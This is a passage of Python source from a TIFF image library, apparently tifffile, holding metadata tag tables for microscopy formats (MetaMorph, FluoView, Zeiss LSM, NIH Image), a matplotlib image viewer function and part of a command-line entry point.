'R': 'tile', # region, point, mosaic 'H': 'lifetime', # histogram 'E': 'lambda', # excitation wavelength 'L': 'exposure', # lux 'V': 'event', 'Q': 'other', #'M': 'mosaic', # LSM 6 } AXES_LABELS.update(dict((v, k) for k, v in AXES_LABELS.items())) # Map OME pixel types to numpy dtype OME_PIXEL_TYPES = { 'int8': 'i1', 'int16': 'i2', 'int32': 'i4', 'uint8': 'u1', 'uint16': 'u2', 'uint32': 'u4', 'float': 'f4', # 'bit': 'bit', 'double': 'f8', 'complex': 'c8', 'double-complex': 'c16', } # NIH Image PicHeader v1.63 NIH_IMAGE_HEADER = [ ('fileid', 'a8'), ('nlines', 'i2'), ('pixelsperline', 'i2'), ('version', 'i2'), ('oldlutmode', 'i2'), ('oldncolors', 'i2'), ('colors', 'u1', (3, 32)), ('oldcolorstart', 'i2'), ('colorwidth', 'i2'), ('extracolors', 'u2', (6, 3)), ('nextracolors', 'i2'), ('foregroundindex', 'i2'), ('backgroundindex', 'i2'), ('xscale', 'f8'), ('_x0', 'i2'), ('_x1', 'i2'), ('units_t', 'i2'), # NIH_UNITS_TYPE ('p1', [('x', 'i2'), ('y', 'i2')]), ('p2', [('x', 'i2'), ('y', 'i2')]), ('curvefit_t', 'i2'), # NIH_CURVEFIT_TYPE ('ncoefficients', 'i2'), ('coeff', 'f8', 6), ('_um_len', 'u1'), ('um', 'a15'), ('_x2', 'u1'), ('binarypic', 'b1'), ('slicestart', 'i2'), ('sliceend', 'i2'), ('scalemagnification', 'f4'), ('nslices', 'i2'), ('slicespacing', 'f4'), ('currentslice', 'i2'), ('frameinterval', 'f4'), ('pixelaspectratio', 'f4'), ('colorstart', 'i2'), ('colorend', 'i2'), ('ncolors', 'i2'), ('fill1', '3u2'), ('fill2', '3u2'), ('colortable_t', 'u1'), # NIH_COLORTABLE_TYPE ('lutmode_t', 'u1'), # NIH_LUTMODE_TYPE ('invertedtable', 'b1'), ('zeroclip', 'b1'), ('_xunit_len', 'u1'), ('xunit', 'a11'), ('stacktype_t', 'i2'), # NIH_STACKTYPE_TYPE ] NIH_COLORTABLE_TYPE = ( 'CustomTable', 'AppleDefault', 'Pseudo20', 'Pseudo32', 'Rainbow', 'Fire1', 'Fire2', 'Ice', 'Grays', 'Spectrum') NIH_LUTMODE_TYPE = ( 'PseudoColor', 'OldAppleDefault', 'OldSpectrum', 'GrayScale', 'ColorLut', 'CustomGrayscale') NIH_CURVEFIT_TYPE = ( 'StraightLine', 'Poly2', 'Poly3', 'Poly4', 'Poly5', 'ExpoFit', 'PowerFit', 'LogFit', 'RodbardFit', 'SpareFit1', 'Uncalibrated', 'UncalibratedOD') NIH_UNITS_TYPE = ( 'Nanometers', 'Micrometers', 'Millimeters', 'Centimeters', 'Meters', 'Kilometers', 'Inches', 'Feet', 'Miles', 'Pixels', 'OtherUnits') NIH_STACKTYPE_TYPE = ( 'VolumeStack', 'RGBStack', 'MovieStack', 'HSVStack') # Map Universal Imaging Corporation MetaMorph internal tag ids to name and type UIC_TAGS = { 0: ('auto_scale', int), 1: ('min_scale', int), 2: ('max_scale', int), 3: ('spatial_calibration', int), 4: ('x_calibration', Fraction), 5: ('y_calibration', Fraction), 6: ('calibration_units', str), 7: ('name', str), 8: ('thresh_state', int), 9: ('thresh_state_red', int), 10: ('tagid_10', None), # undefined 11: ('thresh_state_green', int), 12: ('thresh_state_blue', int), 13: ('thresh_state_lo', int), 14: ('thresh_state_hi', int), 15: ('zoom', int), 16: ('create_time', julian_datetime), 17: ('last_saved_time', julian_datetime), 18: ('current_buffer', int), 19: ('gray_fit', None), 20: ('gray_point_count', None), 21: ('gray_x', Fraction), 22: ('gray_y', Fraction), 23: ('gray_min', Fraction), 24: ('gray_max', Fraction), 25: ('gray_unit_name', str), 26: ('standard_lut', int), 27: ('wavelength', int), 28: ('stage_position', '(%i,2,2)u4'), # N xy positions as fractions 29: ('camera_chip_offset', '(%i,2,2)u4'), # N xy offsets as fractions 30: ('overlay_mask', None), 31: ('overlay_compress', None), 32: ('overlay', None), 33: ('special_overlay_mask', None), 34: ('special_overlay_compress', None), 35: ('special_overlay', None), 36: 
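
# Note: UIC_TAGS entries whose type is a format string containing '%i'
# (for example stage_position's '(%i,2,2)u4', or the '%ip' pascal-string
# sequences) are templates; read_uic_tag earlier in this module
# substitutes the STK plane count before reading, so such tags yield one
# value per plane.
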
('image_property', read_uic_image_property), 37: ('stage_label', '%ip'), # N str 38: ('autoscale_lo_info', Fraction), 39: ('autoscale_hi_info', Fraction), 40: ('absolute_z', '(%i,2)u4'), # N fractions 41: ('absolute_z_valid', '(%i,)u4'), # N long 42: ('gamma', int), 43: ('gamma_red', int), 44: ('gamma_green', int), 45: ('gamma_blue', int), 46: ('camera_bin', int), 47: ('new_lut', int), 48: ('image_property_ex', None), 49: ('plane_property', int), 50: ('user_lut_table', '(256,3)u1'), 51: ('red_autoscale_info', int), 52: ('red_autoscale_lo_info', Fraction), 53: ('red_autoscale_hi_info', Fraction), 54: ('red_minscale_info', int), 55: ('red_maxscale_info', int), 56: ('green_autoscale_info', int), 57: ('green_autoscale_lo_info', Fraction), 58: ('green_autoscale_hi_info', Fraction), 59: ('green_minscale_info', int), 60: ('green_maxscale_info', int), 61: ('blue_autoscale_info', int), 62: ('blue_autoscale_lo_info', Fraction), 63: ('blue_autoscale_hi_info', Fraction), 64: ('blue_min_scale_info', int), 65: ('blue_max_scale_info', int), #66: ('overlay_plane_color', read_uic_overlay_plane_color), } # Olympus FluoView MM_DIMENSION = [ ('name', 'a16'), ('size', 'i4'), ('origin', 'f8'), ('resolution', 'f8'), ('unit', 'a64'), ] MM_HEADER = [ ('header_flag', 'i2'), ('image_type', 'u1'), ('image_name', 'a257'), ('offset_data', 'u4'), ('palette_size', 'i4'), ('offset_palette0', 'u4'), ('offset_palette1', 'u4'), ('comment_size', 'i4'), ('offset_comment', 'u4'), ('dimensions', MM_DIMENSION, 10), ('offset_position', 'u4'), ('map_type', 'i2'), ('map_min', 'f8'), ('map_max', 'f8'), ('min_value', 'f8'), ('max_value', 'f8'), ('offset_map', 'u4'), ('gamma', 'f8'), ('offset', 'f8'), ('gray_channel', MM_DIMENSION), ('offset_thumbnail', 'u4'), ('voice_field', 'i4'), ('offset_voice_field', 'u4'), ] # Carl Zeiss LSM CZ_LSM_INFO = [ ('magic_number', 'u4'), ('structure_size', 'i4'), ('dimension_x', 'i4'), ('dimension_y', 'i4'), ('dimension_z', 'i4'), ('dimension_channels', 'i4'), ('dimension_time', 'i4'), ('data_type', 'i4'), # CZ_DATA_TYPES ('thumbnail_x', 'i4'), ('thumbnail_y', 'i4'), ('voxel_size_x', 'f8'), ('voxel_size_y', 'f8'), ('voxel_size_z', 'f8'), ('origin_x', 'f8'), ('origin_y', 'f8'), ('origin_z', 'f8'), ('scan_type', 'u2'), ('spectral_scan', 'u2'), ('type_of_data', 'u4'), # CZ_TYPE_OF_DATA ('offset_vector_overlay', 'u4'), ('offset_input_lut', 'u4'), ('offset_output_lut', 'u4'), ('offset_channel_colors', 'u4'), ('time_interval', 'f8'), ('offset_channel_data_types', 'u4'), ('offset_scan_info', 'u4'), # CZ_LSM_SCAN_INFO ('offset_ks_data', 'u4'), ('offset_time_stamps', 'u4'), ('offset_event_list', 'u4'), ('offset_roi', 'u4'), ('offset_bleach_roi', 'u4'), ('offset_next_recording', 'u4'), # LSM 2.0 ends here ('display_aspect_x', 'f8'), ('display_aspect_y', 'f8'), ('display_aspect_z', 'f8'), ('display_aspect_time', 'f8'), ('offset_mean_of_roi_overlay', 'u4'), ('offset_topo_isoline_overlay', 'u4'), ('offset_topo_profile_overlay', 'u4'), ('offset_linescan_overlay', 'u4'), ('offset_toolbar_flags', 'u4'), ('offset_channel_wavelength', 'u4'), ('offset_channel_factors', 'u4'), ('objective_sphere_correction', 'f8'), ('offset_unmix_parameters', 'u4'), # LSM 3.2, 4.0 end here ('offset_acquisition_parameters', 'u4'), ('offset_characteristics', 'u4'), ('offset_palette', 'u4'), ('time_difference_x', 'f8'), ('time_difference_y', 'f8'), ('time_difference_z', 'f8'), ('internal_use_1', 'u4'), ('dimension_p', 'i4'), ('dimension_m', 'i4'), ('dimensions_reserved', '16i4'), ('offset_tile_positions', 'u4'), ('reserved_1', '9u4'), 
('offset_positions', 'u4'), ('reserved_2', '21u4'), # must be 0 ] # Import functions for LSM_INFO sub-records CZ_LSM_INFO_READERS = { 'scan_info': read_cz_lsm_scan_info, 'time_stamps': read_cz_lsm_time_stamps, 'event_list': read_cz_lsm_event_list, 'channel_colors': read_cz_lsm_floatpairs, 'positions': read_cz_lsm_floatpairs, 'tile_positions': read_cz_lsm_floatpairs, } # Map cz_lsm_info.scan_type to dimension order CZ_SCAN_TYPES = { 0: 'XYZCT', # x-y-z scan 1: 'XYZCT', # z scan (x-z plane) 2: 'XYZCT', # line scan 3: 'XYTCZ', # time series x-y 4: 'XYZTC', # time series x-z 5: 'XYTCZ', # time series 'Mean of ROIs' 6: 'XYZTC', # time series x-y-z 7: 'XYCTZ', # spline scan 8: 'XYCZT', # spline scan x-z 9: 'XYTCZ', # time series spline plane x-z 10: 'XYZCT', # point mode } # Map dimension codes to cz_lsm_info attribute CZ_DIMENSIONS = { 'X': 'dimension_x', 'Y': 'dimension_y', 'Z': 'dimension_z', 'C': 'dimension_channels', 'T': 'dimension_time', } # Description of cz_lsm_info.data_type CZ_DATA_TYPES = { 0: 'varying data types', 1: '8 bit unsigned integer', 2: '12 bit unsigned integer', 5: '32 bit float', } # Description of cz_lsm_info.type_of_data CZ_TYPE_OF_DATA = { 0: 'Original scan data', 1: 'Calculated data', 2: '3D reconstruction', 3: 'Topography height map', } CZ_LSM_SCAN_INFO_ARRAYS = { 0x20000000: "tracks", 0x30000000: "lasers", 0x60000000: "detection_channels", 0x80000000: "illumination_channels", 0xa0000000: "beam_splitters", 0xc0000000: "data_channels", 0x11000000: "timers", 0x13000000: "markers", } CZ_LSM_SCAN_INFO_STRUCTS = { # 0x10000000: "recording", 0x40000000: "track", 0x50000000: "laser", 0x70000000: "detection_channel", 0x90000000: "illumination_channel", 0xb0000000: "beam_splitter", 0xd0000000: "data_channel", 0x12000000: "timer", 0x14000000: "marker", } CZ_LSM_SCAN_INFO_ATTRIBUTES = { # recording 0x10000001: "name", 0x10000002: "description", 0x10000003: "notes", 0x10000004: "objective", 0x10000005: "processing_summary", 0x10000006: "special_scan_mode", 0x10000007: "scan_type", 0x10000008: "scan_mode", 0x10000009: "number_of_stacks", 0x1000000a: "lines_per_plane", 0x1000000b: "samples_per_line", 0x1000000c: "planes_per_volume", 0x1000000d: "images_width", 0x1000000e: "images_height", 0x1000000f: "images_number_planes", 0x10000010: "images_number_stacks", 0x10000011: "images_number_channels", 0x10000012: "linscan_xy_size", 0x10000013: "scan_direction", 0x10000014: "time_series", 0x10000015: "original_scan_data", 0x10000016: "zoom_x", 0x10000017: "zoom_y", 0x10000018: "zoom_z", 0x10000019: "sample_0x", 0x1000001a: "sample_0y", 0x1000001b: "sample_0z", 0x1000001c: "sample_spacing", 0x1000001d: "line_spacing", 0x1000001e: "plane_spacing", 0x1000001f: "plane_width", 0x10000020: "plane_height", 0x10000021: "volume_depth", 0x10000023: "nutation", 0x10000034: "rotation", 0x10000035: "precession", 0x10000036: "sample_0time", 0x10000037: "start_scan_trigger_in", 0x10000038: "start_scan_trigger_out", 0x10000039: "start_scan_event", 0x10000040: "start_scan_time", 0x10000041: "stop_scan_trigger_in", 0x10000042: "stop_scan_trigger_out", 0x10000043: "stop_scan_event", 0x10000044: "stop_scan_time", 0x10000045: "use_rois", 0x10000046: "use_reduced_memory_rois", 0x10000047: "user", 0x10000048: "use_bc_correction", 0x10000049: "position_bc_correction1", 0x10000050: "position_bc_correction2", 0x10000051: "interpolation_y", 0x10000052: "camera_binning", 0x10000053: "camera_supersampling", 0x10000054: "camera_frame_width", 0x10000055: "camera_frame_height", 0x10000056: "camera_offset_x", 
0x10000057: "camera_offset_y", 0x10000059: "rt_binning", 0x1000005a: "rt_frame_width", 0x1000005b: "rt_frame_height", 0x1000005c: "rt_region_width", 0x1000005d: "rt_region_height", 0x1000005e: "rt_offset_x", 0x1000005f: "rt_offset_y", 0x10000060: "rt_zoom", 0x10000061: "rt_line_period", 0x10000062: "prescan", 0x10000063: "scan_direction_z", # track 0x40000001: "multiplex_type", # 0 after line; 1 after frame 0x40000002: "multiplex_order", 0x40000003: "sampling_mode", # 0 sample; 1 line average; 2 frame average 0x40000004: "sampling_method", # 1 mean; 2 sum 0x40000005: "sampling_number", 0x40000006: "acquire", 0x40000007: "sample_observation_time", 0x4000000b: "time_between_stacks", 0x4000000c: "name", 0x4000000d: "collimator1_name", 0x4000000e: "collimator1_position", 0x4000000f: "collimator2_name", 0x40000010: "collimator2_position", 0x40000011: "is_bleach_track", 0x40000012: "is_bleach_after_scan_number", 0x40000013: "bleach_scan_number", 0x40000014: "trigger_in", 0x40000015: "trigger_out", 0x40000016: "is_ratio_track", 0x40000017: "bleach_count", 0x40000018: "spi_center_wavelength", 0x40000019: "pixel_time", 0x40000021: "condensor_frontlens", 0x40000023: "field_stop_value", 0x40000024: "id_condensor_aperture", 0x40000025: "condensor_aperture", 0x40000026: "id_condensor_revolver", 0x40000027: "condensor_filter", 0x40000028: "id_transmission_filter1", 0x40000029: "id_transmission1", 0x40000030: "id_transmission_filter2", 0x40000031: "id_transmission2", 0x40000032: "repeat_bleach", 0x40000033: "enable_spot_bleach_pos", 0x40000034: "spot_bleach_posx", 0x40000035: "spot_bleach_posy", 0x40000036: "spot_bleach_posz", 0x40000037: "id_tubelens", 0x40000038: "id_tubelens_position", 0x40000039: "transmitted_light", 0x4000003a: "reflected_light", 0x4000003b: "simultan_grab_and_bleach", 0x4000003c: "bleach_pixel_time", # laser 0x50000001: "name", 0x50000002: "acquire", 0x50000003: "power", # detection_channel 0x70000001: "integration_mode", 0x70000002: "special_mode", 0x70000003: "detector_gain_first", 0x70000004: "detector_gain_last", 0x70000005: "amplifier_gain_first", 0x70000006: "amplifier_gain_last", 0x70000007: "amplifier_offs_first", 0x70000008: "amplifier_offs_last", 0x70000009: "pinhole_diameter", 0x7000000a: "counting_trigger", 0x7000000b: "acquire", 0x7000000c: "point_detector_name", 0x7000000d: "amplifier_name", 0x7000000e: "pinhole_name", 0x7000000f: "filter_set_name", 0x70000010: "filter_name", 0x70000013: "integrator_name", 0x70000014: "channel_name", 0x70000015: "detector_gain_bc1", 0x70000016: "detector_gain_bc2", 0x70000017: "amplifier_gain_bc1", 0x70000018: "amplifier_gain_bc2", 0x70000019: "amplifier_offset_bc1", 0x70000020: "amplifier_offset_bc2", 0x70000021: "spectral_scan_channels", 0x70000022: "spi_wavelength_start", 0x70000023: "spi_wavelength_stop", 0x70000026: "dye_name", 0x70000027: "dye_folder", # illumination_channel 0x90000001: "name", 0x90000002: "power", 0x90000003: "wavelength", 0x90000004: "aquire", 0x90000005: "detchannel_name", 0x90000006: "power_bc1", 0x90000007: "power_bc2", # beam_splitter 0xb0000001: "filter_set", 0xb0000002: "filter", 0xb0000003: "name", # data_channel 0xd0000001: "name", 0xd0000003: "acquire", 0xd0000004: "color", 0xd0000005: "sample_type", 0xd0000006: "bits_per_sample", 0xd0000007: "ratio_type", 0xd0000008: "ratio_track1", 0xd0000009: "ratio_track2", 0xd000000a: "ratio_channel1", 0xd000000b: "ratio_channel2", 0xd000000c: "ratio_const1", 0xd000000d: "ratio_const2", 0xd000000e: "ratio_const3", 0xd000000f: "ratio_const4", 0xd0000010: 
"ratio_const5", 0xd0000011: "ratio_const6", 0xd0000012: "ratio_first_images1", 0xd0000013: "ratio_first_images2", 0xd0000014: "dye_name", 0xd0000015: "dye_folder", 0xd0000016: "spectrum", 0xd0000017: "acquire", # timer 0x12000001: "name", 0x12000002: "description", 0x12000003: "interval", 0x12000004: "trigger_in", 0x12000005: "trigger_out", 0x12000006: "activation_time", 0x12000007: "activation_number", # marker 0x14000001: "name", 0x14000002: "description", 0x14000003: "trigger_in", 0x14000004: "trigger_out", } # Map TIFF tag code to attribute name, default value, type, count, validator TIFF_TAGS = { 254: ('new_subfile_type', 0, 4, 1, TIFF_SUBFILE_TYPES()), 255: ('subfile_type', None, 3, 1, {0: 'undefined', 1: 'image', 2: 'reduced_image', 3: 'page'}), 256: ('image_width', None, 4, 1, None), 257: ('image_length', None, 4, 1, None), 258: ('bits_per_sample', 1, 3, 1, None), 259: ('compression', 1, 3, 1, TIFF_COMPESSIONS), 262: ('photometric', None, 3, 1, TIFF_PHOTOMETRICS), 266: ('fill_order', 1, 3, 1, {1: 'msb2lsb', 2: 'lsb2msb'}), 269: ('document_name', None, 2, None, None), 270: ('image_description', None, 2, None, None), 271: ('make', None, 2, None, None), 272: ('model', None, 2, None, None), 273: ('strip_offsets', None, 4, None, None), 274: ('orientation', 1, 3, 1, TIFF_ORIENTATIONS), 277: ('samples_per_pixel', 1, 3, 1, None), 278: ('rows_per_strip', 2**32-1, 4, 1, None), 279: ('strip_byte_counts', None, 4, None, None), 280: ('min_sample_value', None, 3, None, None), 281: ('max_sample_value', None, 3, None, None), # 2**bits_per_sample 282: ('x_resolution', None, 5, 1, None), 283: ('y_resolution', None, 5, 1, None), 284: ('planar_configuration', 1, 3, 1, {1: 'contig', 2: 'separate'}), 285: ('page_name', None, 2, None, None), 286: ('x_position', None, 5, 1, None), 287: ('y_position', None, 5, 1, None), 296: ('resolution_unit', 2, 4, 1, {1: 'none', 2: 'inch', 3: 'centimeter'}), 297: ('page_number', None, 3, 2, None), 305: ('software', None, 2, None, None), 306: ('datetime', None, 2, None, None), 315: ('artist', None, 2, None, None), 316: ('host_computer', None, 2, None, None), 317: ('predictor', 1, 3, 1, {1: None, 2: 'horizontal'}), 318: ('white_point', None, 5, 2, None), 319: ('primary_chromaticities', None, 5, 6, None), 320: ('color_map', None, 3, None, None), 322: ('tile_width', None, 4, 1, None), 323: ('tile_length', None, 4, 1, None), 324: ('tile_offsets', None, 4, None, None), 325: ('tile_byte_counts', None, 4, None, None), 338: ('extra_samples', None, 3, None, {0: 'unspecified', 1: 'assocalpha', 2: 'unassalpha'}), 339: ('sample_format', 1, 3, 1, TIFF_SAMPLE_FORMATS), 340: ('smin_sample_value', None, None, None, None), 341: ('smax_sample_value', None, None, None, None), 347: ('jpeg_tables', None, 7, None, None), 530: ('ycbcr_subsampling', 1, 3, 2, None), 531: ('ycbcr_positioning', 1, 3, 1, None), 32996: ('sgi_matteing', None, None, 1, None), # use extra_samples 32996: ('sgi_datatype', None, None, 1, None), # use sample_format 32997: ('image_depth', None, 4, 1, None), 32998: ('tile_depth', None, 4, 1, None), 33432: ('copyright', None, 1, None, None), 33445: ('md_file_tag', None, 4, 1, None), 33446: ('md_scale_pixel', None, 5, 1, None), 33447: ('md_color_table', None, 3, None, None), 33448: ('md_lab_name', None, 2, None, None), 33449: ('md_sample_info', None, 2, None, None), 33450: ('md_prep_date', None, 2, None, None), 33451: ('md_prep_time', None, 2, None, None), 33452: ('md_file_units', None, 2, None, None), 33550: ('model_pixel_scale', None, 12, 3, None), 33922: ('model_tie_point', 
None, 12, None, None), 34665: ('exif_ifd', None, None, 1, None), 34735: ('geo_key_directory', None, 3, None, None), 34736: ('geo_double_params', None, 12, None, None), 34737: ('geo_ascii_params', None, 2, None, None), 34853: ('gps_ifd', None, None, 1, None), 37510: ('user_comment', None, None, None, None), 42112: ('gdal_metadata', None, 2, None, None), 42113: ('gdal_nodata', None, 2, None, None), 50289: ('mc_xy_position', None, 12, 2, None), 50290: ('mc_z_position', None, 12, 1, None), 50291: ('mc_xy_calibration', None, 12, 3, None), 50292: ('mc_lens_lem_na_n', None, 12, 3, None), 50293: ('mc_channel_name', None, 1, None, None), 50294: ('mc_ex_wavelength', None, 12, 1, None), 50295: ('mc_time_stamp', None, 12, 1, None), 50838: ('imagej_byte_counts', None, None, None, None), 65200: ('flex_xml', None, 2, None, None), # code: (attribute name, default value, type, count, validator) } # Map custom TIFF tag codes to attribute names and import functions CUSTOM_TAGS = { 700: ('xmp', read_bytes), 34377: ('photoshop', read_numpy), 33723: ('iptc', read_bytes), 34675: ('icc_profile', read_bytes), 33628: ('uic1tag', read_uic1tag), # Universal Imaging Corporation STK 33629: ('uic2tag', read_uic2tag), 33630: ('uic3tag', read_uic3tag), 33631: ('uic4tag', read_uic4tag), 34361: ('mm_header', read_mm_header), # Olympus FluoView 34362: ('mm_stamp', read_mm_stamp), 34386: ('mm_user_block', read_bytes), 34412: ('cz_lsm_info', read_cz_lsm_info), # Carl Zeiss LSM 43314: ('nih_image_header', read_nih_image_header), # 40001: ('mc_ipwinscal', read_bytes), 40100: ('mc_id_old', read_bytes), 50288: ('mc_id', read_bytes), 50296: ('mc_frame_properties', read_bytes), 50839: ('imagej_metadata', read_bytes), 51123: ('micromanager_metadata', read_json), } # Max line length of printed output PRINT_LINE_LEN = 79 def imshow(data, title=None, vmin=0, vmax=None, cmap=None, bitspersample=None, photometric='rgb', interpolation='nearest', dpi=96, figure=None, subplot=111, maxdim=8192, **kwargs): """Plot n-dimensional images using matplotlib.pyplot. Return figure, subplot and plot axis. Requires pyplot already imported ``from matplotlib import pyplot``. Parameters ---------- bitspersample : int or None Number of bits per channel in integer RGB images. photometric : {'miniswhite', 'minisblack', 'rgb', or 'palette'} The color space of the image data. title : str Window and subplot title. figure : matplotlib.figure.Figure (optional). Matplotlib to use for plotting. subplot : int A matplotlib.pyplot.subplot axis. maxdim : int maximum image size in any dimension. kwargs : optional Arguments for matplotlib.pyplot.imshow. 
""" #if photometric not in ('miniswhite', 'minisblack', 'rgb', 'palette'): # raise ValueError("Can't handle %s photometrics" % photometric) # TODO: handle photometric == 'separated' (CMYK) isrgb = photometric in ('rgb', 'palette') data = numpy.atleast_2d(data.squeeze()) data = data[(slice(0, maxdim), ) * len(data.shape)] dims = data.ndim if dims < 2: raise ValueError("not an image") elif dims == 2: dims = 0 isrgb = False else: if isrgb and data.shape[-3] in (3, 4): data = numpy.swapaxes(data, -3, -2) data = numpy.swapaxes(data, -2, -1) elif not isrgb and (data.shape[-1] < data.shape[-2] // 16 and data.shape[-1] < data.shape[-3] // 16 and data.shape[-1] < 5): data = numpy.swapaxes(data, -3, -1) data = numpy.swapaxes(data, -2, -1) isrgb = isrgb and data.shape[-1] in (3, 4) dims -= 3 if isrgb else 2 if photometric == 'palette' and isrgb: datamax = data.max() if datamax > 255: data >>= 8 # possible precision loss data = data.astype('B') elif data.dtype.kind in 'ui': if not (isrgb and data.dtype.itemsize <= 1) or bitspersample is None: try: bitspersample = int(math.ceil(math.log(data.max(), 2))) except Exception: bitspersample = data.dtype.itemsize * 8 elif not isinstance(bitspersample, int): # bitspersample can be tuple, e.g. (5, 6, 5) bitspersample = data.dtype.itemsize * 8 datamax = 2**bitspersample if isrgb: if bitspersample < 8: data <<= 8 - bitspersample elif bitspersample > 8: data >>= bitspersample - 8 # precision loss data = data.astype('B') elif data.dtype.kind == 'f': datamax = data.max() if isrgb and datamax > 1.0: if data.dtype.char == 'd': data = data.astype('f') data /= datamax elif data.dtype.kind == 'b': datamax = 1 elif data.dtype.kind == 'c': raise NotImplementedError("complex type") # TODO: handle complex types if not isrgb: if vmax is None: vmax = datamax if vmin is None: if data.dtype.kind == 'i': dtmin = numpy.iinfo(data.dtype).min vmin = numpy.min(data) if vmin == dtmin: vmin = numpy.min(data > dtmin) if data.dtype.kind == 'f': dtmin = numpy.finfo(data.dtype).min vmin = numpy.min(data) if vmin == dtmin: vmin = numpy.min(data > dtmin) else: vmin = 0 pyplot = sys.modules['matplotlib.pyplot'] if figure is None: pyplot.rc('font', family='sans-serif', weight='normal', size=8) figure = pyplot.figure(dpi=dpi, figsize=(10.3, 6.3), frameon=True, facecolor='1.0', edgecolor='w') try: figure.canvas.manager.window.title(title) except Exception: pass pyplot.subplots_adjust(bottom=0.03*(dims+2), top=0.9, left=0.1, right=0.95, hspace=0.05, wspace=0.0) subplot = pyplot.subplot(subplot) if title: try: title = unicode(title, 'Windows-1252') except TypeError: pass pyplot.title(title, size=11) if cmap is None: if data.dtype.kind in 'ubf' or vmin == 0: cmap = 'cubehelix' else: cmap = 'coolwarm' if photometric == 'miniswhite': cmap += '_r' image = pyplot.imshow(data[(0, ) * dims].squeeze(), vmin=vmin, vmax=vmax, cmap=cmap, interpolation=interpolation, **kwargs) if not isrgb: pyplot.colorbar() # panchor=(0.55, 0.5), fraction=0.05 def format_coord(x, y): # callback function to format coordinate display in toolbar x = int(x + 0.5) y = int(y + 0.5) try: if dims: return "%s @ %s [%4i, %4i]" % (cur_ax_dat[1][y, x], current, x, y) else: return "%s @ [%4i, %4i]" % (data[y, x], x, y) except IndexError: return "" pyplot.gca().format_coord = format_coord if dims: current = list((0, ) * dims) cur_ax_dat = [0, data[tuple(current)].squeeze()] sliders = [pyplot.Slider( pyplot.axes([0.125, 0.03*(axis+1), 0.725, 0.025]), 'Dimension %i' % axis, 0, data.shape[axis]-1, 0, facecolor='0.5', valfmt='%%.0f [%i]' % 
data.shape[axis]) for axis in range(dims)] for slider in sliders: slider.drawon = False def set_image(current, sliders=sliders, data=data): # change image and redraw canvas cur_ax_dat[1] = data[tuple(current)].squeeze() image.set_data(cur_ax_dat[1]) for ctrl, index in zip(sliders, current): ctrl.eventson = False ctrl.set_val(index) ctrl.eventson = True figure.canvas.draw() def on_changed(index, axis, data=data, current=current): # callback function for slider change event index = int(round(index)) cur_ax_dat[0] = axis if index == current[axis]: return if index >= data.shape[axis]: index = 0 elif index < 0: index = data.shape[axis] - 1 current[axis] = index set_image(current) def on_keypressed(event, data=data, current=current): # callback function for key press event key = event.key axis = cur_ax_dat[0] if str(key) in '0123456789': on_changed(key, axis) elif key == 'right': on_changed(current[axis] + 1, axis) elif key == 'left': on_changed(current[axis] - 1, axis) elif key == 'up': cur_ax_dat[0] = 0 if axis == len(data.shape)-1 else axis + 1 elif key == 'down': cur_ax_dat[0] = len(data.shape)-1 if axis == 0 else axis - 1 elif key == 'end': on_changed(data.shape[axis] - 1, axis) elif key == 'home': on_changed(0, axis) figure.canvas.mpl_connect('key_press_event', on_keypressed) for axis, ctrl in enumerate(sliders): ctrl.on_changed(lambda k, a=axis: on_changed(k, a)) return figure, subplot, image def _app_show(): """Block the GUI. For use as skimage plugin.""" pyplot = sys.modules['matplotlib.pyplot'] pyplot.show() def main(argv=None): """Command line usage main function.""" if float(sys.version[0:3]) < 2.6: print("This script requires Python version 2.6 or better.") print("This is Python version %s" % sys.version) return 0 if argv is None: argv = sys.argv import optparse parser = optparse.OptionParser( usage="usage: %prog [options] path", description="Display image data in TIFF files.", version="%%prog %s" % __version__) opt = parser.add_option opt('-p', '--page', dest='page', type='int', default=-1, help="display single page") opt('-s', '--series', dest='series', type='int', default=-1, help="display series of pages of same shape") opt('--nomultifile', dest='nomultifile', action='store_true', default=False, help="don't read OME series from multiple files") opt('--noplot', dest='noplot', action='store_true', default=False, help="don't display images") opt('--interpol', dest='interpol', metavar='INTERPOL', default='bilinear', help="image interpolation method") opt('--dpi', dest='dpi', type='int', default=96, help="set plot resolution") opt('--debug', dest='debug', action='store_true', default=False, help="raise exception on failures") opt('--test', dest='test', action='store_true', default=False, help="try read all images in path") opt('--doctest', dest='doctest', action='store_true', default=False, help="runs the docstring examples") opt('-v', '--verbose', dest='verbose', action='store_true', default=True) opt('-q', '--quiet', dest='verbose', action='store_false') settings, path = parser.parse_args() path = ' '.join(path) if settings.doctest: import doctest doctest.testmod() return 0 if not path: parser.error("No file specified") if settings.test: test_tifffile(path, settings.verbose) return 0 if any(i in path for i in '?*'): path = glob.glob(path) if not path: print('no files match the pattern') return 0 # TODO: handle image sequences #if len(path) == 1: path = path[0] print("Reading file structure...", end=' ') start = time.time() try: tif = TiffFile(path, multifile=not 
settings.nomultifile) except Exception as e: if settings.debug: raise else: print("\n", e) sys.exit(0) print("%.3f ms" % ((time.time()-start) * 1e3)) if tif.is_ome: settings.norgb = True images = [(None, tif[0 if settings.page < 0 else settings.page])] if not settings.noplot: print("Reading image data... ", end=' ') def notnone(x): return next(i for i in x if i is not None) start = time.time() try: if settings.page >= 0: images = [(tif.asarray(key=settings.page), tif[settings.page])] elif settings.series >= 0: images = [(tif.asarray(series=settings.series), notnone(tif.series[settings.series].pages))] else: images = [] for i, s in enumerate(tif.series): try: images.append( (tif.asarray(series=i), notnone(s.pages))) except ValueError as e: images.append((None, notnone(s.pages))) if settings.debug: raise else: print("\n* series %i failed: %s... " % (i, e), end='') print("%.3f ms" % ((time.time()-start) * 1e3)) except Exception as e: if settings.debug: raise else: print(e) tif.close() print("\nTIFF file:", tif) print() for i, s in enumerate(tif.series): print ("Series %i" % i) print(s) print() for i, page in images: print(page) print(page.tags) if page.is_palette: print("\nColor Map:", page.color_map.shape, page.color_map.dtype) for attr in ('cz_lsm_info', 'cz_lsm_scan_info', 'uic_tags', 'mm_header', 'imagej_tags', 'micromanager_metadata', 'nih_image_header'): if hasattr(page, attr): print("", attr.upper(), Record(getattr(page, attr)), sep="\n") print() if page.is_micromanager: print('MICROMANAGER_FILE_METADATA') print(Record(tif.micromanager_metadata)) if images and not settings.noplot: try: import matplotlib matplotlib.use('TkAgg') from matplotlib import pyplot except ImportError as e: warnings.warn("failed to import matplotlib.\n%s" % e) else: for img, page in images: if img is None: continue vmin, vmax = None, None if 'gdal_nodata' in page.tags: try: vmin = numpy.min(img[img > float(page.gdal_nodata)]) except ValueError: pass if page.is_stk: try: vmin = page.uic_tags['min_scale'] vmax = page.uic_tags['max_scale'] except KeyError: pass else: if vmax <= vmin: vmin, vmax = None, None title = "%s\n %s" % (str(tif), str(page)) imshow(img, title=title, vmin=vmin, vmax=vmax, 